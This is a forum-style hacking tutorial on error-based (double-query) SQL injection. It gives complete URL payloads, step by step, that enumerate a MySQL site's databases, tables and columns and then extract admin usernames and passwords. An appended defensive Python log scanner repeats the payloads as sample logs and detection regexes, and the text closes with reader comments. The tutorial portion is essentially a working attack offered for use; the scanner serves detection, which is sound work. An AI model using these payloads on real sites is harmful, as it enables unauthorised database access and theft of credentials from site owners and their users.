Error Based Injection - Tutorial by RAi Jee
After union based injection, in this tutorial you will learn error based SQL injection.
How do you know that the target website is vulnerable to error based injection?
While injecting a site, we count the total number of columns and then build our union based SQL query.
Say we got 6 columns; our union based query is:
http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6-- -
When we execute our union based query it doesn't print any vulnerable column number on the webpage or in the HTML.
Instead it gives us an error message:
The used SELECT statements have a different number of columns
Sometimes the target site gives neither a vulnerable column number nor any kind of error. Those sites are also error based / double query SQL injection.
So we proceed with error based queries.
1st step: get the version.
Here is the error based query to get the version:
http://www.target.com/index.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -
and we will get the version printed on the webpage.
2nd step: get the database name.
Now let's check the current database name.
A website can have more than 2, 3 or 5 databases, so we use LIMIT to step through all the databases:
LIMIT 0,1 / LIMIT 1,1 / LIMIT 2,1 / LIMIT 3,1 ...
Here is our query to get the database:
http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
3rd step: get the tables.
Now we have to get the tables, and we want the tables from the primary database.
Here is the query for tables from the primary database:
http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
Increase the value of LIMIT from LIMIT 0,1 to LIMIT 1,1, LIMIT 2,1, LIMIT 3,1 ...
until you get your desired table name.
4th step: get the column names from our targeted table.
Now we have to get the column names from the table.
We got a table called admin.
So let's get the columns from the table admin.
Here is the query for getting the column names from the table admin:
http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xADMIN limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
To get the columns from the table admin we have to encode the table name in hex, and then we can execute our query.
Here is that part in our query:
Table_name=ADMIN
Here Is The HEX Value of ADMIN=61646d696e
Prefix it with 0x to build our correct query:
Table_name=0x61646d696e
And here is the query:
http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
Increase the value of LIMIT: LIMIT 0,1, LIMIT 1,1, LIMIT 2,1 ...
until we get column names like username and password.
5th step: extract data from the columns.
After we get column names like username and password,
the next step is to extract data from these columns.
Here is the query for extracting data from the columns:
http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME_1,0x3a,COLUMN_NAME_2) as char),0x3a)) from TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
We put TABLENAME=admin
and
COLUMN_NAME_1=username
COLUMN_NAME_2=password
So here is the final query:
http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password) as char),0x3a)) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
And we get the admin username and password printed on the page.
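From the defender's side, the same technique leaves a distinctive trail in web-server logs. The following Python scanner is an added example (not part of RAi Jee's tutorial): it URL-decodes request paths from constructed combined-format log lines and flags the request-side signatures of the double-query technique shown above (floor(rand(0)*2), GROUP BY on that expression, information_schema enumeration, UNION column probing and the "-- -" tail). The log lines, IP addresses and field layout are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures of the error-based / double-query technique:
# the floor(rand(0)*2) duplicate-key trick, GROUP BY on that expression,
# information_schema enumeration, UNION column probing, and the "-- -" tail.
SIGNATURES = {
    "double_query_rand": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "group_by_expr": re.compile(r"group\s+by\s+(concat|x\b)"),
    "information_schema": re.compile(r"information_schema\.(tables|columns)"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "comment_tail": re.compile(r"--\s*-?$"),
}

# Combined log format as assumed for this example (ip ident user [ts] "req" status bytes).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+')

def normalize(path):
    """URL-decode twice (undoes double encoding), strip /* */ comments,
    collapse whitespace and lowercase, so the signatures match evasive spellings."""
    s = unquote_plus(unquote_plus(path))
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).strip().lower()

def classify(line):
    """Parse one log line; return its IP, status and the names of the signatures hit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = [name for name, rx in SIGNATURES.items() if rx.search(normalize(m.group("path")))]
    return {"ip": m.group("ip"), "status": m.group("status"), "hits": hits}

def scan(lines):
    """One finding per request that matches at least one signature.
    A 500 status next to a double_query_rand hit is the strongest signal: the
    duplicate-key error the technique relies on reached the application's error page."""
    return [r for r in map(classify, lines) if r and r["hits"]]

# Constructed sample log: one benign request followed by the tutorial's probes.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?id=-1%20Union%20Select%201,2,3,4,5,6--%20- HTTP/1.1" 200 812',
    '203.0.113.7 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?id=1%20or%201%20group%20by%20concat_ws(0x3a,version(),floor(rand(0)*2))%20having%20min(0)%20or%201--%20- HTTP/1.1" 500 640',
    '198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(database()%20as%20char),0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--%20- HTTP/1.1" 500 640',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["status"], ", ".join(f["hits"]))
```

The same normalisation applies equally to a WAF rule or a SIEM query; the fix on the application side remains parameterised queries and not echoing database errors to the client.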
AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee
Nice one.
Is there any vulnerable app to test the same?